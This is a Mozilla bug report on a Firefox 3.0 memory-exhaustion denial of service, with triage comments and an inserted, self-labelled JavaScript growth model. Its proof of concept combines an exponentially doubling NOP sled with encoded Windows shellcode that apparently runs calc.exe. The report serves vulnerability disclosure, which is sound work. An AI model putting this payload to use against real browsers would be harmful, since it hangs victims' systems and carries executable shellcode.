Bug 490748 (Closed) - Opened 16 years ago, closed 13 years ago

Mozilla Firefox 3.0x "throw exception" Silent Memory Exhaustion and Remote Denial of Service

Categories: Core :: JavaScript Engine, defect
Platform: x86, Windows XP
Severity: critical
Status: RESOLVED WORKSFORME

People: Reporter: adi.zerok; Assignee: Unassigned

Details: Keywords: hang; Whiteboard: [sg:dos]

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10

The Mozilla Firefox browser is vulnerable to a memory exhaustion based denial of service which can be triggered remotely. The vulnerability is a result of arbitrary shell code which is rendered in a script tag with an exception that is raised directly with a throw statement. It makes the browser consume memory, thereby impacting the focused window. The impact can be stringent based on different systems.

Reproducible: Always

Steps to Reproduce:
The below mentioned proof of concept will trigger the bug:

<script language="JavaScript">
var nop_sled=unescape("%u9090");
var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
  nop_sled=nop_sled+nop_sled;
  document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
}
</script>

Actual Results:
Browser hangs, thereby impacting the system stability. Process killing is the only solution left.

Expected Results:
This should not happen, and a memory consuming check should be placed to confront it.
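The reporter's loop doubles a one-character string on every iteration, so the memory it asks for grows exponentially. The following added example (not part of the bug report or of Firefox) models that growth without allocating anything, so a triager can see at which iteration a chosen memory budget is crossed, and shows a budgeted version of the same doubling loop that stops instead of exhausting memory. The 2-bytes-per-code-unit model and the budgets in the test are constructed assumptions.

```javascript
// Added example, not from the bug report: growth model for a self-doubling
// string (s = s + s) and a budget-enforcing variant of the same loop.

const UTF16_UNIT_BYTES = 2n; // assumption: one JS code unit costs 2 bytes, no engine overhead

// Length in code units of a seed of `seedLength` units after `doublings` rounds of s = s + s.
function sledLengthAfter(seedLength, doublings) {
  return BigInt(seedLength) << BigInt(doublings);
}

// Bytes occupied by the string alone after `doublings` rounds (real footprint is higher).
function sledBytesAfter(seedLength, doublings) {
  return sledLengthAfter(seedLength, doublings) * UTF16_UNIT_BYTES;
}

// First loop index i (as in `for (i = 0; i < 64; i++)`) whose doubling pushes the
// string past `budgetBytes`. Returns -1 if the budget survives all `maxIter` rounds.
function firstIterationExceeding(seedLength, budgetBytes, maxIter) {
  for (let i = 0; i < maxIter; i++) {
    if (sledBytesAfter(seedLength, i + 1) > BigInt(budgetBytes)) return i;
  }
  return -1;
}

// Budgeted rewrite of the PoC loop: same doubling, but checks the size of the
// next allocation before making it and stops early rather than hanging.
function buildSledWithBudget(seed, doublings, budgetBytes) {
  let s = seed;
  for (let i = 0; i < doublings; i++) {
    const nextBytes = BigInt(s.length) * 2n * UTF16_UNIT_BYTES;
    if (nextBytes > BigInt(budgetBytes)) {
      return { sled: s, doublingsDone: i, stoppedEarly: true };
    }
    s = s + s;
  }
  return { sled: s, doublingsDone: doublings, stoppedEarly: false };
}
```

With a 1-unit seed, 64 doublings give 2^64 code units, and a 4 GiB budget is already exceeded at loop index 31.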
Your script is trying to create a nop_sled string that's 2^64 long (1.8e+19 bytes). That's not going to work when you've only got 2-4Gb of memory or so. I'm sure there must already be a bug on dealing with scripts that try to use unreasonable amounts of memory.
Assignee: nobody → general
Group: core-security
Component: Security → JavaScript Engine
Keywords: hang
Product: Firefox → Core
QA Contact: firefox → general
Whiteboard: [sg:dos]
I understand, but this type of behavior can impact in different layouts.
PoC doesn't seem to do much in 10.0.1, which is the current version. Resolving this.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → WORKSFORME